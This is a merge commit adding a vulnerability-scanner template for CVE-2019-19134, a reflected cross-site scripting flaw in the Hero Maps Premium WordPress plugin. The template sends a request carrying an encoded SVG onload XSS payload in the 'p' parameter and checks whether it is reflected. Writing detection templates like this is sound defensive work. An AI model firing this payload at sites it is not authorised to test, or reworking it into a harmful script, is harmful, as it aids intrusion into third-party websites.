Merge pull request #2024 from daffainfo/patch-62

Create CVE-2019-19134.yaml

cves/2019/CVE-2019-19134.yaml

@@ -0,0 +1,30 @@
+id: CVE-2019-19134
+
+info:
+  name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input    - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+  reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
+  tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'foo"><svg//onload="alert(123)">'
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200